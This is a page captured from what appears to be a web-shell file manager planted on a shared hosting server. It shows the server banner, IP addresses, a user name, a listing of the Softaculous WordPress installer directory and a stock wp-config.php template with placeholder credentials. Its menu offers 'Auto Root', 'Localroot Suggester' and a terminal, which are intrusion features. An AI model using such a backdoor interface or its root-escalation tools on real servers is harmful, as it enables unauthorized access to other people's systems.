Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.222.30.59
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-05-02 14:15
languages
[ DIR ]
drwxr-xr-x
2025-05-02 14:15
php53
[ DIR ]
drwxr-xr-x
2025-05-02 14:15
php56
[ DIR ]
drwxr-xr-x
2025-05-02 14:15
php71
[ DIR ]
drwxr-xr-x
2025-05-02 14:15
php81
[ DIR ]
drwxr-xr-x
2025-05-02 14:15
php82
[ DIR ]
drwxr-xr-x
2025-05-02 14:15
plugins
[ DIR ]
drwxr-xr-x
2025-05-02 14:15
.htaccess
482
B
-rw-r--r--
2021-12-16 09:02
_htaccess
553
B
-rw-r--r--
2021-12-16 09:02
_index.php
59
B
-rw-r--r--
2021-12-16 09:02
_wp-config.php
3.37
KB
-rw-r--r--
2025-04-16 06:47
add_user.php
461
B
-rw-r--r--
2021-12-16 09:02
backup.php
3.02
KB
-rw-r--r--
2025-05-02 08:31
check_charset.php
2.02
KB
-rw-r--r--
2021-12-16 09:02
clone.php
32.23
KB
-rw-r--r--
2025-05-02 08:31
clone.xml
497
B
-rw-r--r--
2021-12-16 09:02
edit.php
9.44
KB
-rw-r--r--
2025-05-02 08:31
edit.xml
1.76
KB
-rw-r--r--
2023-10-03 08:03
extend.php
101.41
KB
-rw-r--r--
2025-05-02 08:31
fileindex.php
291
B
-rw-r--r--
2021-12-16 09:02
import.php
6.53
KB
-rw-r--r--
2025-05-02 08:31
info.xml
15.33
KB
-rw-r--r--
2025-05-02 08:21
install.js
925
B
-rw-r--r--
2023-09-07 09:19
install.php
30.5
KB
-rw-r--r--
2025-05-02 08:31
install.xml
9.71
KB
-rw-r--r--
2025-04-07 07:21
md5
4.51
KB
-rw-r--r--
2025-05-02 08:31
multisite.sql
37.46
KB
-rw-r--r--
2025-05-02 08:21
notes.txt
6.08
KB
-rw-r--r--
2025-05-02 08:21
plugin_activate.php
596
B
-rw-r--r--
2021-12-16 09:02
plugin_deactivate.php
613
B
-rw-r--r--
2021-12-16 09:02
post_download.json
72
B
-rw-r--r--
2022-05-25 11:00
sign_on.php
3.28
KB
-rw-r--r--
2025-01-28 09:04
soft.htaccess
127
B
-rw-r--r--
2021-12-16 09:02
update_pass.php
602
B
-rw-r--r--
2025-04-16 06:47
upgrade.php
14.21
KB
-rw-r--r--
2025-05-02 08:31
upgrade.xml
1.62
KB
-rw-r--r--
2024-11-13 09:30
wp-cli
6.19
MB
-rwxr-xr-x
2022-07-15 05:49
wp-config.php
3.08
KB
-rw-r--r--
2024-11-13 09:30
wp.sql
30.17
KB
-rw-r--r--
2025-05-02 08:21
wp.zip
26.93
MB
-rw-r--r--
2025-05-02 08:21
Save
Rename
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', '[[softdb]]' ); /** Database username */ define( 'DB_USER', '[[softdbuser]]' ); /** Database password */ define( 'DB_PASSWORD', '[[softdbpass]]' ); /** Database hostname */ define( 'DB_HOST', '[[softdbhost]]' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', '[[utf8]]' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '[[AUTH_KEY]]' ); define( 'SECURE_AUTH_KEY', '[[SECURE_AUTH_KEY]]' ); define( 'LOGGED_IN_KEY', '[[LOGGED_IN_KEY]]' ); define( 'NONCE_KEY', '[[NONCE_KEY]]' ); define( 'AUTH_SALT', '[[AUTH_SALT]]' ); define( 'SECURE_AUTH_SALT', '[[SECURE_AUTH_SALT]]' ); define( 'LOGGED_IN_SALT', '[[LOGGED_IN_SALT]]' ); define( 'NONCE_SALT', '[[NONCE_SALT]]' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = '[[dbprefix]]'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';